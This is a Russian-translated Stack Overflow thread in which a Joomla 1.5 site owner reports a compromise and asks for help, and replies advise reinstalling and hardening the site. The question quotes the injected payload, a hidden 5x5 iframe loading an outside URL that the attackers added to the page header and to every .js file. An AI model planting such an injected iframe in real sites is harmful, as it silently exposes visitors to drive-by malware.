Внезапно это было добавлено на мой веб-сайт joomla 1.5: xxxxxx.org/Lexmark?8

Два дня назад это начало появляться в шапке нашего сайта joomla 1.5:

<iframe src="http://xxxxxx.org/Lexmark?8" align="middle" frameborder="no" height="5" scrolling="auto" width="5">/iframe>

Я не могу найти никаких ссылок на него и не знаю, как он туда попал. Я не могу удалить его. Я пробовал все, включая обновление всех плагинов, удаление плагинов и компонентов и т. д.

Кто-нибудь еще сталкивался с этим, и если да, то как мне избавиться от этого?

Обновление: кажется, что в конец каждого файла .js на сайте добавлена ​​указанная выше строка. Есть ли способ удалить их, не загружая каждый файл и не редактируя каждый из них вручную?


php joomla malware
person user1756373    schedule 18.10.2012    source источник
comment
Это Джумла! вредоносное ПО. На SO есть много тем, посвященных этому.   -  person Florent    schedule 18.10.2012
comment
Вас взломали. Простое удаление не решит вашу проблему, они просто взломают вас снова.   -  person ceejayoz    schedule 18.10.2012

Ответы (1)


arrow_upward
0
arrow_downward

Поздравляем, вас взломали. Обычно это происходит из-за использования более старой версии Joomla или установленных расширений, и даже ребенок может легко взломать сайты, которые не обновляются. Переустановите Joomla (последняя версия 2.5) и снова настройте свой сайт. Не пытайтесь исправить файлы, так как у вас, вероятно, есть бэкдоры.

Прочитайте это и следите за каждым словом: http://docs.joomla.org/Security

person Stilero    schedule 21.10.2012